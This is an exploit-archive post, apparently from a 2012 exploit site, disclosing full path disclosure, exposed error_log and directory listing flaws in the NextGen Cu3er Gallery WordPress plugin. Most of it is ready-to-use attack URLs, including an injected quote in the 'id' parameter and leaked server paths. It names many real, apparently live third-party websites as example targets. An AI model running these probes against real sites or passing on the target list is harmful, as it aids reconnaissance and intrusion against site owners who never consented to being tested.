# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 # 0 _ __ __ __ 1 # 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 # 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 # 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 # 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 # 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 # 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 # 1 \ \____/ >> Exploit database separated by exploit 0 # 0 \/___/ type (local, remote, DoS, etc.) 1 # 1 1 # 0 [x] Official Website: http://www.1337day.com 0 # 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 # 0 0 # 1 ========================================== 1 # 0 I'm Dark-Puzzle From Inj3ct0r TEAM 0 # 0 1 # 1 dark-puzzle[at]live[at]fr 0 # 0 ========================================== 1 # 1 White Hat 1 # 0 Independant Pentester 0 # 1 exploit coder/bug researcher 0 # 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 # Exploit Title: Wordpress plugins - NextGen Cu3er Gallery Multiple Vulnerabilities . # Date: 31 August 2012 # Author: Dark-Puzzle (Souhail Hammou) # Risk : Medium # Version: All Versions # Google Dork : N/A # Category: Webapps/0day # Tested on: Windows Xp Sp2 Fr . # Gr337ings to : Inj3ct0r Team - Packetstormsecurity.org - Securityfocus.com - Jigsaw - Dark-Soldier ... ---------------------------------------------------- I - Multiple Full Path Disclosure Vulnerabilities : ---------------------------------------------------- *********************************** 1.1 - Using XML Parsing Error *********************************** http://www.example.com/PATH/nextgen-cu3er-gallery/xml/xml_made_by_me.php?id=2 Exploitation : http://www.example.com/PATH/nextgen-cu3er-gallery/xml/xml_made_by_me.php?id='2' Live Examples = http://interactivemind.eu/wp-content/plugins/nextgen-cu3er-gallery/xml/xml_made_by_me.php?id='2' http://canadachalet.com/nantel/wp-content/plugins/nextgen-cu3er-gallery/xml/cu3er.php?id='1' http://www.sansexception.eu/wp-content/plugins/nextgen-cu3er-gallery/xml/cu3er.php?id='12' ************************************ 1.2 - Displaying error_log file ************************************ While the first method is not working --> you can't retrieve the full path because there's no error shown . but in fact there's an error not shown in your browser but written into the error_log . Example : http://www.entre-chiens-et-chats-agadir.com/wp-content/plugins/nextgen-cu3er-gallery/xml/cu3er.php?id='1' You can't see the error now but when you go straight to the error_log at : http://www.entre-chiens-et-chats-agadir.com/wp-content/plugins/nextgen-cu3er-gallery/xml/error_log and scroll all the way down you'll find . [31-Aug-2012 11:11:31] PHP Warning: shuffle() expects parameter 1 to be array, string given in /home1/entrechi/public_html/wp-content/plugins/nextgen-cu3er-gallery/xml/cu3er.php on line 86 [31-Aug-2012 11:11:31] PHP Warning: Invalid argument supplied for foreach() in /home1/entrechi/public_html/wp-content/plugins/nextgen-cu3er-gallery/xml/cu3er.php on line 87 The Full path : /home1/entrechi/public_html/wp-content/plugins/nextgen-cu3er-gallery/xml/cu3er.php Other Example Sites : http://www.interactivemind.ro/wp-content/plugins/nextgen-cu3er-gallery/xml/error_log http://trafficflo.net/blog/wp-content/plugins/nextgen-cu3er-gallery/error_log http://interactivemind.eu/wp-content/plugins/nextgen-cu3er-gallery/error_log http://interactivemind.eu/wp-content/plugins/nextgen-cu3er-gallery/xml/error_log -------------------------------------------------- II - Directory listing Vulnerability : ------------------------------------------------- ---> wp-content/plugins/nextgen-cu3er-gallery/xml/ ( could contain .listing which is the output of a ls -lah command ) ---> wp-content/plugins/nextgen-cu3er-gallery Examples : http://sanabeltrading.biz/wp-content/plugins/nextgen-cu3er-gallery/ http://www.tvmcgill.com/wordpress/wp-content/plugins/nextgen-cu3er-gallery/xml/ http://www.mjrgrp.com/demo/santa/wp-content/plugins/nextgen-cu3er-gallery/xml/ # Datasec Team